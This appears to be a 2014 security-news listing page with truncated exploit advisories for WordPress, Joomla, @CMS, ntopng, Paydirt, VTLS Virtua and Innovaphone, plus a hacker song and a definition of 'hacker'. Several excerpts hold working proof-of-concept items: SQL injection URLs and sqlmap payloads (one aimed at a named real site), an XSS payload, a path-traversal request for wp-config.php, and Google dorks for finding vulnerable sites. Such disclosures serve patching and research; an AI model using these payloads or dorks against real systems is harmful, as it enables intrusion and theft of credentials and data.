WordPress WPtouch Mobile 3.4.5 Shell Upload

27 August 2014 - Source: http://www.mondounix.com
WordPress WPtouch Mobile Plugin File Upload Vulnerability
 


Joomla Spider 2.8.3 SQL Injection

27 August 2014 - Source: http://www.mondounix.com
######################
# Exploit Title : Joomla Spider video player 2.8.3 SQL Injection
 
# Exploit Author : Claudio Viviani
 
# Vendor Homepage : http://web-dorado.com/
 
# Software Link : http://extensions.joomla.org/extensions/multimedia/multimedia-players/video-players-a-gallery/22321
 
# Dork Google: inurl:/component/spidervideoplayer
               inurl:option=com_spidervideoplayer    
 
# Date : 2014-08-26
 
# Tested on : Windows 7 / Mozilla Firefox
#             Linux / Mozilla Firefox
 
 
 
######################
 
# PoC Exploit:
 
http://localhost/component/spidervideoplayer/?view=settings&format=row&typeselect=0&playlist=1,&theme=1'
 
"theme"...


Online Time Tracking Cross Site Scripting

26 August 2014 - Source: http://www.mondounix.com
# Affected software: Online Time Tracking - URL: https://paydirtapp.com/
# Discovered by: Provensec
# Website: http://www.provensec.com
# Type of vulnerability: XSS Stored
# Description: Paydirt is time tracking and invoicing software made for
browser-based freelancers and small businesses. It keeps track of who
you're working for so that you don't have to.
Paydirt is currently integrated with Chrome and Firefox, and will prompt
you to track time based on the websites you're using and the emails you
write.
# Proof of concept:
1 Go to https://paydirtapp.com/clients
2 Add a new client with any XSS payload, for example ("><img src=d onmouseover=prompt(1);>)
3 Now go to https://paydirtapp.com/clients again and the XSS works
4 Add...


CMS 2.1.1 SQL Injection

26 August 2014 - Source: http://www.mondounix.com
# SQL Injection on @CMS 2.1.1 Stable
# Risk: High
# CWE number: CWE-89
# Date: 22/08/2014
# Vendor: www.atcode.net
# Author: Felipe " Renzi " Gabriel
# Contact: renzi@linuxmail.org
# Tested on: Linux Mint
# Vulnerable File: articles.php
# Exploit:  http://host/articles.php?cat_id=[SQLI]
# PoC:      http://carla-columna.de/articles.php?cat_id=[SQLI]
 
 
--- "SQLi using sqlmap."---
 
Place: GET
Parameter: cat_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: cat_id=5' AND 6158=6158 AND 'SEMo'='SEMo
 
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: cat_id=5' UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7163666971,0x6648715351716d446a54,0x71676e6371),NULL,NULL,NULL,NULL,NULL,NULL#
 
...


ntopng 1.2.0 Cross Site Scripting

26 August 2014 - Source: http://www.mondounix.com
ntopng 1.2.0 XSS injection using monitored network traffic
 
ntopng is the next generation version of the original ntop, a network 
traffic probe and monitor that shows the network usage, similar to what 
the popular top Unix command does.
 
The web-based frontend of the software is vulnerable to injection of 
script code via forged HTTP Host: request header lines in monitored 
network traffic.
 
HTTP Host request header lines are extracted using nDPI traffic 
classification library and used without sanitization in several places 
in the frontend, e.g. the Host overview and specific subpages for each 
monitored host.
 
The injected code might be used to execute javascript and to perform 
management actions with...


VTLS-Virtua SQL Injection

26 August 2014 - Source: http://www.mondounix.com
=====[Alligator Security Team - Security Advisory]============================
 
     - VTLS Virtua InfoStation.cgi SQLi - CVE-2014-2081 -
 
  Author: José Tozo  < juniorbsd () gmail com >
 
=====[Table of Contents]======================================================
 
1. Background
2. Detailed description
3. Other contexts & solutions
4. Timeline
5. References
 
=====[1. Background]============================================================
 
* Versions affected: VTLS Virtua InfoStation.cgi - All Versions under 2014.X
                                                 - or 2013.2.X Are Affected
* Release date: 22/08/2014
* Impact: Allows unauthorized disclosure of information; Allows
unauthorized...


WordPress KenBurner Slider Arbitrary File Download

26 August 2014 - Source: http://www.mondounix.com
# Exploit Title : WordPress Plugin KenBurner Slider Arbitrary File Download Vulnerability
# Google Dork: Index of /wp-content/plugins/kbslider
# Date: 2014-08-21
# Exploit Author: MF0x and Daniel Pentest
# Vendor Homepage: http://codecanyon.net/item/responsive-kenburner-slider-jquery-plugin/1633038 
# Version: All
# Tested on: Windows 7 / Google Chrome
 
Description:
The WordPress plugin called KenBurner Slider suffers from an arbitrary file download vulnerability
 
Proof of Concept (PoC):
http://victim/wp-admin/admin-ajax.php?action=kbslider_show_image&img=../wp-config.php
 
# Discovered by: MF0x and Daniel Pentest             
 
# Website: http://www.null-source.blogspot.com.br/
# Email: daniel@analistadesistema.net
#...


Ballata Hacker

24 August 2014 - Source: http://www.mondounix.com

Angelo Rindone - Ballata Hacker

I dream of an open source world
where knowledge is free
like blood in the veins
it carries oxygen

and that is why I stand
on the side of the pirates
and that is why I have
the pores of my skin dilated

YOU CALL US CRIMINALS
AND WE EXPLORE
YOU CALL US CRIMINALS
AND WE SEEK KNOWLEDGE
YOU CALL US CRIMINALS
BUT WE EXIST
WITHOUT SKIN COLOR
WITHOUT NATIONALITY! *

I play an open source dream
because the patent is an obsession
of those who want to be master
master for a whole lifetime

and that is why I know
what I have done,
what I have
I leave it free in the air
free in the air.....

http://www.inventati.org/hackeralbum/hacker.html

...


Hacker

24 August 2014 - Source: http://www.mondounix.com


A hacker (a term coined in the United States of America) is a person who takes on intellectual challenges to creatively circumvent or overcome the limitations imposed on them, not only in their fields of interest (which usually include computer science or electronic engineering), but in all aspects of life.

There is a commonplace, used mainly by the mass media (since the 1980s), whereby the term hacker is associated with computer criminals, whose correct designation is instead cracker.

Origin of the term

The New Hacker Dictionary, an online compendium that collects the terms...


Innovaphone PBX Cross Site Request Forgery

24 August 2014 - Source: http://www.mondounix.com
Title: Innovaphone PBX Admin-GUI CSRF
Impact: High
CVSS2 Score: 7.8 (AV:N/AC:M/Au:S/C:P/I:C/A:C/E:F/RL:U/RC:C)
Announced: August 21, 2014
Reporter: Rainer Giedat (NSIDE ATTACK LOGIC GmbH, www.nsideattacklogic.de)
Products: Innovaphone PBX Administration GUI
Affected Versions: all known versions (tested 10.00 sr11)
CVE-id: CVE-2014-5335
 
Summary
=======
 
The innovaphone PBX is a powerful and sophisticated VoIP telephone system for use in professional business environments. In addition to a wide range of IP telephony functionalities, the innovaphone PBX is also equipped with a perfectly integrated Unified Communications solution that can be enabled as needed at any time and at any workspace.
 
The innovaphone PBX uses...
